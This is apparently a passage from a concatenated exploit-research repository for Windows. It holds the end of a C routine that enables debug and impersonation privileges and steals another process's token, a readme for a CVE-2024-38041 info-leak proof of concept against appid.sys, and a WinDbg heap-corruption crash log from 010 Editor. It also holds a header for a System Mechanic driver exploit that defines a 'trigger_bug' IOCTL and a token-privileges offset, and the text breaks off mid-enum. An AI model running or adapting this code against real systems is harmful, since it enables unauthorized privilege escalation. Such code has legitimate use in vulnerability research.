tp.Privileges[0].Luid.HighPart = 0; 231 | tp.Privileges[0].Luid.LowPart = LUID_SE_DEBUG; 232 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 233 | Status = NtAdjustPrivilegesToken(currentTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL); 234 | if (Status != STATUS_NOT_ALL_ASSIGNED) 235 | CHECK_STATUS(L"NtAdjustPrivilegesToken() #1 returned ", Status); 236 | 237 | tp.PrivilegeCount = 1; 238 | tp.Privileges[0].Luid.HighPart = 0; 239 | tp.Privileges[0].Luid.LowPart = LUID_SE_IMPERSONATE; 240 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 241 | Status = NtAdjustPrivilegesToken(currentTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL); 242 | if (Status != STATUS_NOT_ALL_ASSIGNED) 243 | CHECK_STATUS(L"NtAdjustPrivilegesToken() #2 returned ", Status); 244 | 245 | DWORD dwDesiredAccess; 246 | OBJECT_ATTRIBUTES Obja; 247 | CLIENT_ID ClientId; 248 | 249 | dwDesiredAccess = PROCESS_QUERY_INFORMATION; 250 | ClientId.UniqueThread = NULL; 251 | ClientId.UniqueProcess = (HANDLE)(dwPid); 252 | InitializeObjectAttributes(&Obja, NULL, 0, NULL, NULL, NULL); 253 | 254 | Status = NtOpenProcess(&targetProcessHandle, dwDesiredAccess, &Obja, &ClientId); // Cannot access PPL processes 255 | CHECK_STATUS(L"NtOpenProcess() returned ", Status); 256 | 257 | HANDLE targetTokenHandle = NULL; 258 | 259 | Status = NtOpenProcessToken( 260 | targetProcessHandle, 261 | TOKEN_DUPLICATE | TOKEN_IMPERSONATE | TOKEN_QUERY, 262 | &targetTokenHandle); 263 | CHECK_STATUS(L"NtOpenProcessToken() returned ", Status); 264 | 265 | OBJECT_ATTRIBUTES Obja2; 266 | SECURITY_QUALITY_OF_SERVICE SecurityQualityOfService; 267 | 268 | SecurityQualityOfService.Length = sizeof(SECURITY_QUALITY_OF_SERVICE); 269 | SecurityQualityOfService.ImpersonationLevel = SecurityImpersonation; 270 | SecurityQualityOfService.ContextTrackingMode = FALSE; 271 | SecurityQualityOfService.EffectiveOnly = FALSE; 272 | InitializeObjectAttributes(&Obja2, NULL, 0, NULL, NULL, &SecurityQualityOfService); 273 | 274 | Status = NtDuplicateToken( 275 | targetTokenHandle, 276 | MAXIMUM_ALLOWED, 277 | &Obja2, 278 | FALSE, 279 | TokenImpersonation, 280 | &duplicatedTokenHandle); 281 | CHECK_STATUS(L"NtDuplicateToken() returned ", Status); 282 | 283 | tp.PrivilegeCount = 1; 284 | tp.Privileges[0].Luid.HighPart = 0; 285 | tp.Privileges[0].Luid.LowPart = LUID_SE_ASSIGNPRIMARYTOKEN; 286 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED; 287 | 288 | Status = NtAdjustPrivilegesToken(duplicatedTokenHandle, FALSE, &tp, sizeof(tp), NULL, NULL); 289 | if (Status != STATUS_NOT_ALL_ASSIGNED) 290 | CHECK_STATUS(L"NtAdjustPrivilegesToken() #1 returned ", Status); 291 | 292 | Status = NtSetInformationThread( 293 | currentThreadHandle, 294 | ThreadImpersonationToken, 295 | (PVOID)&duplicatedTokenHandle, 296 | sizeof(duplicatedTokenHandle)); 297 | CHECK_STATUS(L"NtSetInformationThread() returned ", Status); 298 | 299 | *duplicateTokenHandleOut = duplicatedTokenHandle; 300 | } -------------------------------------------------------------------------------- /Windows/CVE-2024-38041/readme.md: -------------------------------------------------------------------------------- 1 | # PoC For CVE-2024-38041 (Info Leak) 2 | This exploit targets appid.sys driver 3 | -------------------------------------------------------------------------------- /Windows/Crashdumps/010_editor_crash.txt: -------------------------------------------------------------------------------- 1 | Heap corruption 2 | 3 | 0:000> k 4 | # Child-SP RetAddr Call Site 5 | 00 0000007a`cdf6b090 00007ffd`4a38f393 ntdll!RtlReportFatalFailure+0x9 6 | 01 0000007a`cdf6b0e0 00007ffd`4a398112 ntdll!RtlReportCriticalFailure+0x97 7 | 02 0000007a`cdf6b1d0 00007ffd`4a3983fa ntdll!RtlpHeapHandleError+0x12 8 | 03 0000007a`cdf6b200 00007ffd`4a39e081 ntdll!RtlpHpHeapHandleError+0x7a 9 | 04 0000007a`cdf6b230 00007ffd`4a2bd80f ntdll!RtlpLogHeapFailure+0x45 10 | 05 0000007a`cdf6b260 00007ffd`4a2bb44d ntdll!RtlpAllocateHeap+0x6af 11 | 06 0000007a`cdf6b4b0 00007ffd`4a2af44f ntdll!RtlpAllocateHeapInternal+0xa2d 12 | 07 0000007a`cdf6b5c0 00007ffd`4a2b0b31 ntdll!RtlpAllocateUserBlockFromHeap+0x63 13 | 08 0000007a`cdf6b640 00007ffd`4a2bbeda ntdll!RtlpAllocateUserBlock+0x111 14 | 09 0000007a`cdf6b690 00007ffd`4a2bb3c7 ntdll!RtlpLowFragHeapAllocFromContext+0x88a 15 | 0a 0000007a`cdf6b750 00007ffd`47f0fde6 ntdll!RtlpAllocateHeapInternal+0x9a7 16 | 0b 0000007a`cdf6b860 00007ffc`d2a92cc3 ucrtbase!_malloc_base+0x36 17 | 0c 0000007a`cdf6b890 00007ffc`d29c1671 Qt5Core!QCoreApplication::translate+0x49a23 18 | 0d 0000007a`cdf6b8c0 00007ffc`d27bdd8e Qt5Core!QVariant::QVariant+0x21 19 | 0e 0000007a`cdf6b8f0 00007ffc`d27c0109 Qt5Core!QVariantAnimation::qt_static_metacall+0x111e 20 | 0f 0000007a`cdf6b930 00007ffc`d27c14e0 Qt5Core!QVariantAnimation::interpolated+0x49 21 | 10 0000007a`cdf6b960 00007ffc`d27bb616 Qt5Core!QVariantAnimation::qt_metacast+0x5b0 22 | 11 0000007a`cdf6ba30 00007ffc`d27bbaeb Qt5Core!QAbstractAnimation::setCurrentTime+0xd6 23 | 12 0000007a`cdf6ba80 00007ffc`d8fbe31b Qt5Core!QUnifiedTimer::setSlowdownFactor+0x29b 24 | 13 0000007a`cdf6bc10 00007ffc`d8febf88 Qt5Widgets!QMainWindowLayoutSeparatorHelper::adjustCursor+0x81b 25 | 14 0000007a`cdf6bd00 00007ffc`d8febf35 Qt5Widgets!QDockAreaLayoutInfo::apply+0x1b8 26 | 15 0000007a`cdf6bd80 00007ffc`d8febd5c Qt5Widgets!QDockAreaLayoutInfo::apply+0x165 27 | 16 0000007a`cdf6be00 00007ffc`d901a2f4 Qt5Widgets!QDockAreaLayout::apply+0x4c 28 | 17 0000007a`cdf6be30 00007ffc`d90212b5 Qt5Widgets!QMainWindowLayout::applyState+0x674 29 | 18 0000007a`cdf6bf10 00007ffc`d8f09b3d Qt5Widgets!QMainWindowLayout::setGeometry+0x145 30 | 19 0000007a`cdf6bf90 00007ffc`d8f08b60 Qt5Widgets!QLayoutPrivate::doResize+0xad 31 | 1a 0000007a`cdf6bff0 00007ffc`d8f0b276 Qt5Widgets!QLayout::activate+0x2a0 32 | 1b 0000007a`cdf6c070 00007ffc`d8ef5820 Qt5Widgets!QLayout::widgetEvent+0x56 33 | 1c 0000007a`cdf6c0a0 00007ffc`d8ef48b8 Qt5Widgets!QApplicationPrivate::notify_helper+0xf0 34 | 1d 0000007a`cdf6c0d0 00007ffc`d2986f3a Qt5Widgets!QApplication::notify+0x1878 35 | 1e 0000007a`cdf6c600 00007ffc`d2988ce5 Qt5Core!QCoreApplication::notifyInternal2+0xba 36 | 1f 0000007a`cdf6c670 00007ffc`f390dd5f Qt5Core!QCoreApplicationPrivate::sendPostedEvents+0x215 37 | 20 0000007a`cdf6c730 00007ffc`d29d1587 qwindows!qt_plugin_query_metadata+0x20af 38 | 21 0000007a`cdf6c760 00007ffc`f390dd39 Qt5Core!QEventDispatcherWin32::processEvents+0x67 39 | 22 0000007a`cdf6f8a0 00007ffc`d298307c qwindows!qt_plugin_query_metadata+0x2089 40 | 23 0000007a`cdf6f8d0 00007ffc`d2985f04 Qt5Core!QEventLoop::exec+0x1bc 41 | 24 0000007a`cdf6f930 00007ff7`e3c109c4 Qt5Core!QCoreApplication::exec+0x154 42 | 25 0000007a`cdf6f990 00007ff7`e3d47967 010Editor+0x4009c4 43 | 26 0000007a`cdf6fb00 00007ff7`e3d468e6 010Editor+0x537967 44 | 27 0000007a`cdf6fb90 00007ffd`49067374 010Editor+0x5368e6 45 | 28 0000007a`cdf6fbd0 00007ffd`4a2dcc91 KERNEL32!BaseThreadInitThunk+0x14 46 | 29 0000007a`cdf6fc00 00000000`00000000 ntdll!RtlUserThreadStart+0x21 47 | 0:000> !analyze -v 48 | ******************************************************************************* 49 | * * 50 | * Exception Analysis * 51 | * * 52 | ******************************************************************************* 53 | 54 | 55 | KEY_VALUES_STRING: 1 56 | 57 | Key : Analysis.CPU.mSec 58 | Value: 703 59 | 60 | Key : Analysis.Elapsed.mSec 61 | Value: 706 62 | 63 | Key : Analysis.IO.Other.Mb 64 | Value: 20 65 | 66 | Key : Analysis.IO.Read.Mb 67 | Value: 1 68 | 69 | Key : Analysis.IO.Write.Mb 70 | Value: 29 71 | 72 | Key : Analysis.Init.CPU.mSec 73 | Value: 3750 74 | 75 | Key : Analysis.Init.Elapsed.mSec 76 | Value: 441258 77 | 78 | Key : Analysis.Memory.CommitPeak.Mb 79 | Value: 178 80 | 81 | Key : Analysis.Version.DbgEng 82 | Value: 10.0.27704.1001 83 | 84 | Key : Analysis.Version.Description 85 | Value: 10.2408.27.01 amd64fre 86 | 87 | Key : Analysis.Version.Ext 88 | Value: 1.2408.27.1 89 | 90 | Key : Failure.Bucket 91 | Value: HEAP_CORRUPTION_c0000374_010Editor.exe!heap_corruption!010Editor.exe 92 | 93 | Key : Failure.Hash 94 | Value: {1b833736-4abe-e70f-202c-45eeab348924} 95 | 96 | Key : Timeline.OS.Boot.DeltaSec 97 | Value: 372657 98 | 99 | Key : Timeline.Process.Start.DeltaSec 100 | Value: 441 101 | 102 | Key : WER.OS.Branch 103 | Value: vb_release 104 | 105 | Key : WER.OS.Version 106 | Value: 10.0.19041.1 107 | 108 | Key : WER.Process.Version 109 | Value: 14.0.1.0 110 | 111 | 112 | NTGLOBALFLAG: 0 113 | 114 | APPLICATION_VERIFIER_FLAGS: 0 115 | 116 | EXCEPTION_RECORD: (.exr -1) 117 | ExceptionAddress: 00007ffd4a38f3c9 (ntdll!RtlReportFatalFailure+0x0000000000000009) 118 | ExceptionCode: c0000374 119 | ExceptionFlags: 00000001 120 | NumberParameters: 1 121 | Parameter[0]: 00007ffd4a3f97f0 122 | 123 | FAULTING_THREAD: 0000352c 124 | 125 | PROCESS_NAME: 010Editor.exe 126 | 127 | ERROR_CODE: (NTSTATUS) 0xc0000374 - A heap has been corrupted. 128 | 129 | EXCEPTION_CODE_STR: c0000374 130 | 131 | EXCEPTION_PARAMETER1: 00007ffd4a3f97f0 132 | 133 | ADDITIONAL_DEBUG_TEXT: Enable Pageheap/AutoVerifer 134 | 135 | STACK_TEXT: 136 | 00000000`00000000 00000000`00000000 010Editor.exe!heap_corruption!010Editor.exe+0x0 137 | 00000000`00000000 00000000`00000000 unknown![~0s]+0x0 138 | 0000007a`cdf6b090 00007ffd`4a38f3c9 ntdll!RtlReportFatalFailure+0x0 139 | 0000007a`cdf6b0e0 00007ffd`4a38f393 ntdll!RtlReportCriticalFailure+0x0 140 | 0000007a`cdf6b1d0 00007ffd`4a398112 ntdll!RtlpHeapHandleError+0x0 141 | 0000007a`cdf6b200 00007ffd`4a3983fa ntdll!RtlpHpHeapHandleError+0x0 142 | 0000007a`cdf6b230 00007ffd`4a39e081 ntdll!RtlpLogHeapFailure+0x0 143 | 0000007a`cdf6b260 00007ffd`4a2bd80f ntdll!RtlpAllocateHeap+0x0 144 | 0000007a`cdf6b4b0 00007ffd`4a2bb44d ntdll!RtlpAllocateHeapInternal+0x0 145 | 0000007a`cdf6b5c0 00007ffd`4a2af44f ntdll!RtlpAllocateUserBlockFromHeap+0x0 146 | 0000007a`cdf6b640 00007ffd`4a2b0b31 ntdll!RtlpAllocateUserBlock+0x0 147 | 0000007a`cdf6b690 00007ffd`4a2bbeda ntdll!RtlpLowFragHeapAllocFromContext+0x0 148 | 0000007a`cdf6b750 00007ffd`4a2bb3c7 ntdll!RtlpAllocateHeapInternal+0x0 149 | 0000007a`cdf6b860 00007ffd`47f0fde6 ucrtbase!_malloc_base+0x0 150 | 0000007a`cdf6b890 00007ffc`d2a92cc3 Qt5Core+0x0 151 | 0000007a`cdf6b8c0 00007ffc`d29c1671 Qt5Core+0x0 152 | 0000007a`cdf6b8f0 00007ffc`d27bdd8e Qt5Core+0x0 153 | 0000007a`cdf6b930 00007ffc`d27c0109 Qt5Core+0x0 154 | 0000007a`cdf6b960 00007ffc`d27c14e0 Qt5Core+0x0 155 | 0000007a`cdf6ba30 00007ffc`d27bb616 Qt5Core+0x0 156 | 0000007a`cdf6ba80 00007ffc`d27bbaeb Qt5Core+0x0 157 | 0000007a`cdf6bc10 00007ffc`d8fbe31b Qt5Widgets+0x0 158 | 0000007a`cdf6bd00 00007ffc`d8febf88 Qt5Widgets+0x0 159 | 0000007a`cdf6bd80 00007ffc`d8febf35 Qt5Widgets+0x0 160 | 0000007a`cdf6be00 00007ffc`d8febd5c Qt5Widgets+0x0 161 | 0000007a`cdf6be30 00007ffc`d901a2f4 Qt5Widgets+0x0 162 | 0000007a`cdf6bf10 00007ffc`d90212b5 Qt5Widgets+0x0 163 | 0000007a`cdf6bf90 00007ffc`d8f09b3d Qt5Widgets+0x0 164 | 0000007a`cdf6bff0 00007ffc`d8f08b60 Qt5Widgets+0x0 165 | 0000007a`cdf6c070 00007ffc`d8f0b276 Qt5Widgets+0x0 166 | 0000007a`cdf6c0a0 00007ffc`d8ef5820 Qt5Widgets+0x0 167 | 0000007a`cdf6c0d0 00007ffc`d8ef48b8 Qt5Widgets+0x0 168 | 0000007a`cdf6c600 00007ffc`d2986f3a Qt5Core+0x0 169 | 0000007a`cdf6c670 00007ffc`d2988ce5 Qt5Core+0x0 170 | 0000007a`cdf6c730 00007ffc`f390dd5f qwindows+0x0 171 | 0000007a`cdf6c760 00007ffc`d29d1587 Qt5Core+0x0 172 | 0000007a`cdf6f8a0 00007ffc`f390dd39 qwindows+0x0 173 | 0000007a`cdf6f8d0 00007ffc`d298307c Qt5Core+0x0 174 | 0000007a`cdf6f930 00007ffc`d2985f04 Qt5Core+0x0 175 | 0000007a`cdf6f990 00007ff7`e3c109c4 010Editor+0x0 176 | 0000007a`cdf6fb00 00007ff7`e3d47967 010Editor+0x0 177 | 0000007a`cdf6fb90 00007ff7`e3d468e6 010Editor+0x0 178 | 0000007a`cdf6fbd0 00007ffd`49067374 KERNEL32!BaseThreadInitThunk+0x0 179 | 0000007a`cdf6fc00 00007ffd`4a2dcc91 ntdll!RtlUserThreadStart+0x0 180 | 181 | 182 | STACK_COMMAND: ** Pseudo Context ** Pseudo ** Value: ffffffff ** ; kb 183 | 184 | SYMBOL_NAME: 010Editor.exe!heap_corruption!010Editor.exe 185 | 186 | MODULE_NAME: 010Editor 187 | 188 | IMAGE_NAME: 010Editor.exe 189 | 190 | FAILURE_BUCKET_ID: HEAP_CORRUPTION_c0000374_010Editor.exe!heap_corruption!010Editor.exe 191 | 192 | OS_VERSION: 10.0.19041.1 193 | 194 | BUILDLAB_STR: vb_release 195 | 196 | OSPLATFORM_TYPE: x64 197 | 198 | OSNAME: Windows 10 199 | 200 | IMAGE_VERSION: 14.0.1.0 201 | 202 | FAILURE_ID_HASH: {1b833736-4abe-e70f-202c-45eeab348924} 203 | 204 | Followup: MachineOwner 205 | --------- 206 | 207 | 0:000> dq 7ffd4a3f97f0 208 | 00007ffd`4a3f97f0 000006d0`00000002 00000000`00000006 209 | 00007ffd`4a3f9800 0000020c`521b0000 0000020c`5d12a3c0 210 | 00007ffd`4a3f9810 00000000`00000000 00000000`00000000 211 | 00007ffd`4a3f9820 00000000`00000000 0000020c`5d119fb0 212 | 00007ffd`4a3f9830 0000020c`5d139fc0 00000000`00000fc0 213 | 00007ffd`4a3f9840 00000000`00001041 00007ffd`4a39e081 214 | 00007ffd`4a3f9850 00007ffd`4a2bd80f 00007ffd`4a2bb44d 215 | 00007ffd`4a3f9860 00007ffd`4a2af44f 00007ffd`4a2b0b31 216 | 0:000> !heap 7ffd4a3f97f0 217 | HEAPEXT: Unable to get address of ntdll!RtlpHeapInvalidBadAddress. 218 | Index Address Name Debugging options enabled 219 | 0:000> !heap 220 | ************************************************************** 221 | * * 222 | * HEAP ERROR DETECTED * 223 | * * 224 | ************************************************************** 225 | 226 | Details: 227 | 228 | Heap address: 0000020c521b0000 229 | Error address: 0000020c5d12a3c0 230 | Last known valid blocks: before - 0000020c5d119fb0, after - 0000020c5d139fc0 231 | Error type: HEAP_FAILURE_BUFFER_OVERRUN 232 | Details: The heap manager detected an error whose features are 233 | consistent with a buffer overrun. 234 | Follow-up: Enable pageheap. 235 | 236 | Stack trace: 237 | Stack trace at 0x00007ffd4a3f9848 238 | 00007ffd4a39e081: ntdll!RtlpLogHeapFailure+0x45 239 | 00007ffd4a2bd80f: ntdll!RtlpAllocateHeap+0x6af 240 | 00007ffd4a2bb44d: ntdll!RtlpAllocateHeapInternal+0xa2d 241 | 00007ffd4a2af44f: ntdll!RtlpAllocateUserBlockFromHeap+0x63 242 | 00007ffd4a2b0b31: ntdll!RtlpAllocateUserBlock+0x111 243 | 00007ffd4a2bbeda: ntdll!RtlpLowFragHeapAllocFromContext+0x88a 244 | 00007ffd4a2bb3c7: ntdll!RtlpAllocateHeapInternal+0x9a7 245 | 00007ffd47f0fde6: ucrtbase!_malloc_base+0x36 246 | 00007ffcd2a92cc3: Qt5Core!QCoreApplication::translate+0x49a23 247 | 00007ffcd29c1671: Qt5Core!QVariant::QVariant+0x21 248 | 00007ffcd27bdd8e: Qt5Core!QVariantAnimation::qt_static_metacall+0x111e 249 | 00007ffcd27c0109: Qt5Core!QVariantAnimation::interpolated+0x49 250 | 00007ffcd27c14e0: Qt5Core!QVariantAnimation::qt_metacast+0x5b0 251 | 00007ffcd27bb616: Qt5Core!QAbstractAnimation::setCurrentTime+0xd6 252 | 00007ffcd27bbaeb: Qt5Core!QUnifiedTimer::setSlowdownFactor+0x29b 253 | 00007ffcd8fbe31b: Qt5Widgets!QMainWindowLayoutSeparatorHelper::adjustCursor+0x81b 254 | 255 | Heap Address NT/Segment Heap 256 | 257 | 0000020c521b0000 NT Heap 258 | 0000020c52020000 NT Heap 259 | 0000020c52400000 NT Heap 260 | 0000020c53c00000 NT Heap 261 | 0:000> dq 0000020c5d12a3c0 262 | 0000020c`5d12a3c0 01010101`01010101 00010101`01010101 263 | 0000020c`5d12a3d0 0000020c`5d255bc0 0000020c`5d14afb0 264 | 0000020c`5d12a3e0 00000000`00000000 00000000`00000000 265 | 0000020c`5d12a3f0 00000000`00000000 00000000`00000000 266 | 0000020c`5d12a400 00000000`00000000 00000000`00000000 267 | 0000020c`5d12a410 00000000`00000000 00000000`00000000 268 | 0000020c`5d12a420 00000000`00000000 00000000`00000000 269 | 0000020c`5d12a430 00000000`00000000 00000000`00000000 270 | -------------------------------------------------------------------------------- /Windows/SystemMechanicPro/Defs.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | #define IOCTL_trigger_bug 0x226003 // (UNKNOWN (0x22) | 0x800 | FILE_READ_ACCESS | METHOD_NEITHER) 5 | 6 | typedef struct _arguments_to_func 7 | { 8 | uint64_t arg1; 9 | uint64_t arg2; 10 | int64_t arg3; 11 | int64_t arg4; 12 | } arguments_to_func; 13 | 14 | typedef struct _input_buffer 15 | { 16 | DWORD function_index; 17 | DWORD padding; 18 | arguments_to_func *ptr_to_args; 19 | PVOID ptr2_to_return; 20 | } input_buffer; 21 | 22 | #define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L) 23 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L) 24 | #define OBJ_CASE_INSENSITIVE 0x00000040L 25 | #define FILE_OPEN 0x00000001 26 | #define OFFSET_OF_TOKEN_PRIVILEGES 0x40 // Windows X >= Windows Vista 27 | 28 | #define InitializeObjectAttributes( p, n, a, r, s ) { \ 29 | (p)->Length = sizeof( OBJECT_ATTRIBUTES ); \ 30 | (p)->RootDirectory = r; \ 31 | (p)->Attributes = a; \ 32 | (p)->ObjectName = n; \ 33 | (p)->SecurityDescriptor = s; \ 34 | (p)->SecurityQualityOfService = NULL; \ 35 | } 36 | 37 | typedef enum _SYSTEM_INFORMATION_CLASS { 38 | SystemBasicInformation = 0, 39 | SystemProcessorInformation = 1, 40 | SystemPerformanceInformation = 2, 41 | SystemTimeOfDayInformation = 3, 42 | SystemPathInformation = 4, 43 | SystemProcessInformation = 5, 44 | SystemCallCountInformation = 6, 45 | SystemDeviceInformation = 7, 46 | SystemProcessorPerformanceInformation = 8, 47 | SystemFlagsInformation = 9, 48 | SystemCallTimeInformation = 10, 49 | SystemModuleInformation = 11, 50 | SystemLocksInformation = 12, 51 | SystemStackTraceInformation = 13, 52 | SystemPagedPoolInformation = 14, 53 | SystemNonPagedPoolInformation = 15, 54 | SystemHandleInformation = 16, 55 | SystemObjectInformation = 17, 56 | SystemPageFileInformation = 18, 57 | SystemVdmInstemulInformation = 19, 58 | SystemVdmBopInformation = 20, 59 | SystemFileCacheInformation = 21, 60 | SystemPoolTagInformation = 22, 61 | SystemInterruptInformation = 23, 62 | SystemDpcBehaviorInformation = 24, 63 | SystemFullMemoryInformation = 25, 64 | SystemLoadGdiDriverInformation = 26, 65 | SystemUnloadGdiDriverInformation = 27, 66 | SystemTimeAdjustmentInformation = 28, 67 | SystemSummaryMemoryInformation = 29, 68 | SystemMirrorMemoryInformation = 30, 69 | SystemPerformanceTraceInformation = 31, 70 | SystemObsolete0 = 32, 71 | SystemExceptionInformation = 33, 72 | SystemCrashDumpStateInformation = 34, 73 | SystemKernelDebuggerInformation = 35, 74 | SystemContextSwitchInformation = 36, 75 | SystemRegistryQuotaInformation = 37, 76 | SystemExtendServiceTableInformation = 38, 77 | SystemPrioritySeperation = 39, 78 | SystemVerifierAddDriverInformation = 40, 79 | SystemVerifierRemoveDriverInformation = 41, 80 | SystemProcessorIdleInformation = 42, 81 | SystemLegacyDriverInformation = 43, 82 | SystemCurrentTimeZoneInformation = 44, 83 | SystemLookasideInformation = 45, 84 | SystemTimeSlipNotification = 46, 85 | SystemSessionCreate = 47, 86 | SystemSessionDetach = 48, 87 | SystemSessionInformation = 49, 88 | SystemRangeStartInformation = 50, 89 | SystemVerifierInformation = 51, 90 | SystemVerifierThunkExtend = 52, 91 | SystemSessionProcessInformation = 53, 92 | SystemLoadGdiDriverInSystemSpace = 54, 93 | SystemNumaProcessorMap = 55, 94 | SystemPrefetcherInformation = 56, 95 | SystemExtendedProcessInformation = 57, 96 | SystemRecommendedSharedDataAlignment = 58, 97 | SystemComPlusPackage = 59, 98 | SystemNumaAvailableMemory = 60, 99 | SystemProcessorPowerInformation = 61, 100 | SystemEmulationBasicInformation = 62, 101 | SystemEmulationProcessorInformation = 63, 102 | SystemExtendedHandleInformation = 64, 103 | SystemLostDelayedWriteInformation = 65, 104 | SystemBigPoolInformation = 66, 105 | SystemSessionPoolTagInformation = 67, 106 | SystemSessionMappedViewInformation = 68, 107 | SystemHotpatchInformation = 69, 108 | SystemObjectSecurityMode = 70, 109 | SystemWatchdogTimerHandler = 71, 110 | SystemWatchdogTimerInformation = 72, 111 | SystemLogicalProcessorInformation = 73, 112 | SystemWow64SharedInformationObsolete = 74, 113 | SystemRegisterFirmwareTableInformationHandler = 75, 114 | SystemFirmwareTableInformation = 76, 115 | SystemModuleInformationEx = 77, 116 | SystemVerifierTriageInformation = 78, 117 | SystemSuperfetchInformation = 79, 118 | SystemMemoryListInformation = 80, 119 | SystemFileCacheInformationEx = 81, 120 | SystemThreadPriorityClientIdInformation = 82, 121 | SystemProcessorIdleCycleTimeInformation = 83, 122 | SystemVerifierCancellationInformation = 84, 123 | SystemProcessorPowerInformationEx = 85, 124 | SystemRefTraceInformation = 86, 125 | SystemSpecialPoolInformation = 87, 126 | SystemProcessIdInformation = 88, 127 | SystemErrorPortInformation = 89, 128 | SystemBootEnvironmentInformation = 90, 129 | SystemHypervisorInformation = 91, 130 | SystemVerifierInformationEx = 92, 131 | SystemTimeZoneInformation = 93, 132 | SystemImageFileExecutionOptionsInformation = 94, 133 | SystemCoverageInformation = 95, 134 | SystemPrefetchPatchInformation = 96, 135 | SystemVerifierFaultsInformation = 97, 136 | SystemSystemPartitionInformation = 98, 137 | SystemSystemDiskInformation = 99, 138 | SystemProcessorPerformanceDistribution = 100, 139 | SystemNumaProximityNodeInformation = 101, 140 | SystemDynamicTimeZoneInformation = 102, 141 | SystemCodeIntegrityInformation = 103, 142 | SystemProcessorMicrocodeUpdateInformation = 104, 143 | SystemProcessorBrandString = 105, 144 | SystemVirtualAddressInformation = 106, 145 | SystemLogicalProcessorAndGroupInformation = 107, 146 | SystemProcessorCycleTimeInformation = 108, 147 | SystemStoreInformation = 109, 148 | SystemRegistryAppendString = 110, 149 | SystemAitSamplingValue = 111, 150 | SystemVhdBootInformation = 112, 151 | SystemCpuQuotaInformation = 113, 152 | SystemNativeBasicInformation = 114, 153 | SystemErrorPortTimeouts = 115, 154 | SystemLowPriorityIoInformation = 116, 155 | SystemBootEntropyInformation = 117, 156 | SystemVerifierCountersInformation = 118, 157 | SystemPagedPoolInformationEx = 119, 158 | SystemSystemPtesInformationEx = 120, 159 | SystemNodeDistanceInformation = 121, 160 | SystemAcpiAuditInformation = 122, 161 | SystemBasicPerformanceInformation = 123, 162 | SystemQueryPerformanceCounterInformation = 124, 163 | SystemSessionBigPoolInformation = 125, 164 | SystemBootGraphicsInformation = 126, 165 | SystemScrubPhysicalMemoryInformation = 127, 166 | SystemBadPageInformation = 128, 167 | SystemProcessorProfileControlArea = 129, 168 | SystemCombinePhysicalMemoryInformation = 130, 169 | SystemEntropyInterruptTimingInformation = 131, 170 | SystemConsoleInformation = 132, 171 | SystemPlatformBinaryInformation = 133, 172 | SystemPolicyInformation = 134, 173 | SystemHypervisorProcessorCountInformation = 135, 174 | SystemDeviceDataInformation = 136, 175 | SystemDeviceDataEnumerationInformation = 137, 176 | SystemMemoryTopologyInformation = 138, 177 | SystemMemoryChannelInformation = 139, 178 | SystemBootLogoInformation = 140, 179 | SystemProcessorPerformanceInformationEx = 141, 180 | SystemCriticalProcessErrorLogInformation = 142, 181 | SystemSecureBootPolicyInformation = 143, 182 | SystemPageFileInformationEx = 144, 183 | SystemSecureBootInformation = 145, 184 | SystemEntropyInterruptTimingRawInformation = 146, 185 | SystemPortableWorkspaceEfiLauncherInformation = 147, 186 | SystemFullProcessInformation = 148, 187 | SystemKernelDebuggerInformationEx = 149, 188 | SystemBootMetadataInformation = 150, 189 | SystemSoftRebootInformation = 151, 190 | SystemElamCertificateInformation = 152, 191 | SystemOfflineDumpConfigInformation = 153, 192 | SystemProcessorFeaturesInformation = 154, 193 | SystemRegistryReconciliationInformation = 155, 194 | SystemEdidInformation = 156, 195 | SystemManufacturingInformation = 157, 196 | SystemEnergyEstimationConfigInformation = 158, 197 | SystemHypervisorDetailInformation = 159, 198 | SystemProcessorCycleStatsInformation = 160, 199 | SystemVmGenerationCountInformation = 161, 200 | SystemTrustedPlatformModuleInformation = 162, 201 | SystemKernelDebuggerFlags = 163, 202 | SystemCodeIntegrityPolicyInformation = 164, 203 | SystemIsolatedUserModeInformation = 165, 204 | SystemHardwareSecurityTestInterfaceResultsInformation = 166, 205 | SystemSingleModuleInformation = 167, 206 | SystemAllowedCpuSetsInformation = 168, 207 | SystemVsmProtectionInformation = 169, 208 | SystemInterruptCpuSetsInformation = 170, 209 | SystemSecureBootPolicyFullInformation = 171, 210 | SystemCodeIntegrityPolicyFullInformation = 172, 211 | SystemAffinitizedInterruptProcessorInformation = 173, 212 | SystemRootSiloInformation = 174, 213 | SystemCpuSetInformation = 175, 214 | SystemCpuSetTagInformation = 176, 215 | SystemWin32WerStartCallout = 177, 216 | SystemSecureKernelProfileInformation = 178, 217 | SystemCodeIntegrityPlatformManifestInformation = 179, 218 | SystemInterruptSteeringInformation = 180, 219 | SystemSupportedProcessorArchitectures = 181, 220 | SystemMemoryUsageInformation = 182, 221 | SystemCodeIntegrityCertificateInformation = 183, 222 | SystemPhysicalMemoryInformation = 184, 223 | SystemControlFlowTransition = 185, 224 | SystemKernelDebuggingAllowed = 186, 225 | SystemActivityModerationExeState = 187, 226 | SystemActivityModerationUserSettings = 188, 227 | SystemCodeIntegrityPoliciesFullInformation = 189, 228 | SystemCodeIntegrityUnlockInformation = 190, 229 | SystemIntegrityQuotaInformation = 191, 230 | SystemFlushInformation = 192, 231 | SystemProcessorIdleMaskInformation = 193, 232 | SystemSecureDumpEncryptionInformation = 194, 233 | SystemWriteConstraintInformation = 195, 234 | SystemKernelVaShadowInformation = 196, 235 | SystemHypervisorSharedPageInformation = 197, 236 | SystemFirmwareBootPerformanceInformation = 198, 237 | SystemCodeIntegrityVerificationInformation = 199, 238 | SystemFirmwarePartitionInformation = 200, 239 | SystemSpeculationControlInformation = 201, 240 | SystemDmaGuardPolicyInformation = 202, 241 | SystemEnclaveLaunchControlInformation = 203, 242 | SystemWorkloadAllowedCpuSetsInformation = 204, 243 | SystemCodeIntegrityUnlockModeInformation = 205, 244 | SystemLeapSecondInformation = 206, 245 | SystemFlags2Information = 207, 246 | SystemSecurityModelInformation = 208, 247 | SystemCodeIntegritySyntheticCacheInformation = 209, 248 | SystemFeatureConfigurationInformation = 210, 249 | SystemFeatureConfigurationSectionInformation = 211, 250 | SystemFeatureUsageSubscriptionInformation = 212, 251 | SystemSecureSpeculationControlInformation = 213, 252 | 